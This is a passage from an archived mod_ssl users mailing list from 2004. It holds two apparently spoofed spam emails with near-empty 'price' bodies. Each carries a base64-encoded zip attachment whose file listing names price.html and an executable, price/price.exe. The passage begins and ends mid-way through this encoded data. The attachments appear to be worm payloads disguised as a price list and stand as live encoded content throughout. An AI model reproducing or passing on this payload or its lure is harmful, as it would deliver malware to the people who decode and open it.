JmWBuYWo1KZGB1+/WN7G+teR1fU0+L1oGmKpCgZWqKUUIs4dsRhySfi20PBl3ZIss44iINS4
Ktsl+IvxJQZZMrF/KhI3HhiuHp6XqdMcCwsDLTAT/axQBweOGZF1jo1FymJp+RCeSzE+LtHg
xI1cFGp5OUMvRlMdpGBwh/XmX7+zq+oxnF/cPTAIHW5QvyvfbcWIlTiLLBjGxtEF9/k/6CR2
tuGJuxpdKupK0YnBq9WxD90o13F1FdlWEHtEOzvFCEcP/i6mPLaKcGVwCTmDSfzIwC73xuq5
JD7nSm4EIXfkADBNi4fRkcsmj8AeQjabx3KVuGMZ9WKjOg/EFEleGsDZ4xRuWo25lTxTTT08
wPtoketAWusYnuUUJUfVJbfuBlN0WdEYC9EURHSGjjRMRoTU5UXryKQj3I5C62kjgYEbMWSX
D2uUwz21fDhJFY5ExxFUjh4NZyHDPo85rue6ee6LlnLwDFfn8VWMB6wxLa9J7aVKhLlVTNMp
yKUS7A0xQ47Jtup0rI8etUBHdUfLY7FCaYaYiKwUY3kKesxGLhAV/IiYeRRBCffq1BWmHGr0
JQ+hqiPlYOrCzUZrQDZNWDUyK5OqwdqYUU6lkOfXyiqVjQh5cNLLJtbdgFCOhrTHZaYVGdeL
EEfHmWDK0HfJEzqQTGvJ/BxbGtcsQQv5DVsuU8MXhIeICGes6HG03HjMtEcjrUIfkWN5D935
2esVozYrfIfDoBFXN+sEyFzEvFqJctNihXKwWRwpzihFyhBOA7HOch4rhKQa3g6TBTXiQJdd
TSqyHI15fHNHNSnGi7Klc8cUHVPL5jiMSTdjjhapjFHZGqmjwrzNj3g45IhEizdAYJ2LivRF
huFo8Gh17jm8Ui5Pw0mw77cVN5oChWrUjrgOEsOVTD0qI/ajY4NGxl9ivIpZJ27LY0fLUrmS
44a4tIHJ+DFkSEV4NRM2j0goWmjZcLGIyIbr6EmcC0gzVLc+g3oBqUktG7Yc1oilMSgxz+x6
PeUifF84U0WyZLD82WJgR3Vkr84CcSWI6UQPWUZUF30DwWwnOqp2ZVaKKfBL0Zcv/s0FPCqt
Y/xlG9ssOj4AkkevdSzbyusWle0odyf4Ksx0WL0sTlFySBsVuRThmrhriHdKusUQJtfdIDh2
YLPIa0vCR0SLSKFpBwllpOa6OtrDt3FikercXwphogjIKWSF1l3WnF5xoq9E+FVPjM8kejwc
v9HmoGgwv+joDGeZm5BVnMvROuEnGBtRcAxFBBHUkCuSOMgieReRIRkM7tymTv1bB4oQSAeX
CD1VbJc5CrPrHEiypUVc6M67AMPgf5lrlJWIjjmFX3Tka9aN7L5D/JTBLGp+4B+AWv2/b720
PdX+bHxj53OdP+l8s3N5oi3x2cS1iQ2JbYlsYjLxrcSfJh5KPJp4MvEPiX9KnEicTJxOvJv4
pa4NXZu7Ml27uu7pmu76YdeRrh93Hev6WderXa93nep6u2u2qzHZnFyZXJVck2xLXpW8JhlP
rk9+PtmbvDGZSe5M7k7mklrSTLrJ8eQHnsfHz8/1CBvKbt80OJwaSO/eqis2c9iIuzv4SX93
8AcBO+FsdGbuHvCCH4r3DtpyZdhUyaKf8hf9prdTt10v+AuA9Nh8lf8JAGr+XyoM0BJb+PsF
8aN78MvfVhDsyoetnI/0819QSwECFAAUAAAACADUgQkxNwKtUgkCAAA+BAAACgAAAAAAAAAB
ACAAgIEAAAAAcHJpY2UuaHRtbFBLAQIUAAoAAAAAAHQ5CTEAAAAAAAAAAAAAAAAGAAAAAAAA
AAAAEADAQTECAABwcmljZS9QSwECFAAUAAAACAAOggkxnAUjyesTAAAAOgAADwAAAAAAAAAA
ACIAwIFVAgAAcHJpY2UvcHJpY2UuZXhlUEsFBgAAAAADAAMAqQAAAG0WAAAAAA==

----------ygptoosnzeesfaiucysi--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:17:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 14A51A8D09; Mon,  9 Aug 2004 21:17:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pc7644-41.org (c7644-wgfw-1.nrl.navy.mil [132.250.160.38])
	by master.modssl.org (Postfix) with SMTP id 2A9FFA8D0F
	for ; Mon,  9 Aug 2004 21:17:03 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:16:50 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------uqejqzufagmsxehelhvm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------uqejqzufagmsxehelhvm
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------uqejqzufagmsxehelhvm
Content-Type: application/octet-stream; name="price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price.zip"

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

----------uqejqzufagmsxehelhvm--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 21:20:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1E7BAA8CD1; Mon,  9 Aug 2004 21:20:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from L30227.org (pooch.adams.com [65.201.211.56])
	by master.modssl.org (Postfix) with SMTP id 17686A8A4D
	for ; Mon,  9 Aug 2004 21:20:33 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:20:27 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------bjuxgnzrtifaxtbbaqqp"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------bjuxgnzrtifaxtbbaqqp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


  price







----------bjuxgnzrtifaxtbbaqqp
Content-Type: application/octet-stream; name="new_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new_price.zip"

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
